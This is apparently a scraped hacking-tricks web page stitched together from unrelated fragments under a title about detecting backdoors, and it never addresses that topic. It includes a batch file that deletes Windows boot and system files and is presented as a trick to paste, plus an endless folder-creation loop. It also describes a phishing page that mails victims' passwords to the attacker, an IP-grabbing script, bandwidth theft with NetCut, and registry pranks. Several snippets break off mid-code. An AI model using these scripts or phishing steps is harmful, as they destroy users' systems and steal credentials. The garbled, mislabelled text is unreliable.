How to Detect Hidden Backdoors, Trojan Horses and Rootkit Tools ?
Learn How To Detect A Backdoor On a Tool.
In this article i'm going to show you how to detect a backdoor on a tool.
What is a BackDoor?
A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected, the backdoor may take the form of an installed program, or could be a modification to an existing program or hardware device. It hides in the computer, scans existing loopholes, opens corresponding ports, as well as modifies system registration files.
If you are browsing internet from a router/modem which is connected to
several computers (Computer lab or your Hostel LAN), then here is a powerful application waiting for you.
Often when we are accessing internet in this situation, the speed
decreases by a significant amount. It happens due to the fall down of bandwidth allotted among the connected computers.
NETCUT is a revolutionary software which will help you get the share of bandwidth which is earlier shared by another computer.
Today many of third parties software are online but they required to purchase them which a normal visitor can not do, So here is yourself own folder locker, just create it and guard your files saftely. Thus is far good and simple.
How To Make It?
Just Copy The Below Code And Paste It Into A NotePad File Then Save It To .bat Format.Your Folder Locker Is Ready To Work.
Quote:
Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
Follow these simple steps and change the name of your Recycle Bin. Have some change on your Desktop.
Goto Start menu and Choose 'Run'(win+r) command.
Type regedit . U will see Registery Editor Window on Ur Screen.
Now, On the Left Hand Side of the Window you'll see a Tree of folders Just DoubleClick on the HKEY_CURRENT_USER >Software>Microsoft>Windows>Current Version>Explorer>CLSID.
Here I will describe all the methods which are popular in the world of hacking in order to hack into a computer terminal and online account.
1. Phishing
This is a method where you have to bring the user to a webpage created by you which appears to be the same as the interface of the legitimate one and get him/her to enter the credentials. Then the redirect page will land somewhere else and you will get the password in your mail box as defined inside the php script.
This is method to get someone IP using a PHP script. Just copy the below code and paste it in notepad. Save the file as ip.php you can change ip to any name but .php is must.
This will make it to where your friend cannot click on anything on the screen.
1. Take a screenshot of the desktop. You can use windows printscreen key.(next to F12 key) 2. Make your printscreen picture as desktop background. 3. Save that in ms paint. and set that image as ur background. 4. Right click on desktop , then click Arrange Icons By->Show Desktop Icons That is it , when you click on the “icons”, nothing will happen! Hope you'll have a lot of fun after seeing ppl clicking on icon which doesn't react. :)
Here I will teach you simple prank that will make an unlimited amount offolders in any place you want.
1. Open notepad and type : @echo off :top md %random% goto top 2. Save it as 1000folders.bat. 3. After that you will get a unknown icon so u better change the icon 4. Right click on icon >properties>customize>change icon. Changing icon is optional.
Open notepad and copy/paste this code: @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini
Stop other user's from copying you private files through USB drives. The following registry setting will prevent writing to usb in windows xp.
Expand HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control Add a new key and name it "StorageDevicePolicies". In the window on the right then create a new DWORD value and label it WriteProtect, give it a value of "1" and users can no longer write to USB drives. Giving a value of "0" will allow to write again.
Make the folder INVISIBLE without hiding 1)Right Click on the desktop.Make a new folder 2)Now rename the folder with a space and,U have to hold ALT key and type 0160). (please use N0 keys) 3)Now u have a folder with out a name. 4)Right click on the folder>properties>customize. Click on change icon. 5)Scroll a bit, u should find some empty spaces,(between icons there will be blank spaces) Click on any one of them. now u can store ur personal data without any 3rd party tools. Trust me it's soo cool Trick :)
Many of us sometimes find the folder options missing in windows explorer. Here's the solution Open Run and then type "gpedit.msc". Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.
Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"
Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured. I hopes that you will find the option after restarting windows.
With this trick you can play with any pc...after this trick if some one opens my computer he/she'll not see any drive in my computer. Open Registry Editor by typing "regedit.exe" in Run or in command prompt. There you navigate to registry entry HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer Now in the right pane create a new DWORD item (by rightclicking and new->dword) and name it NoDrives ( case sensitive).
How to find whether your computer is male or female ?
Using this interesting tricks you can find the gender of your computer whether your computer is male or female.(just kidding) Just follow the below steps.
•Open Notepad and paste the following code.CreateObject("SAPI.SpVoice").Speak"i am Awesome"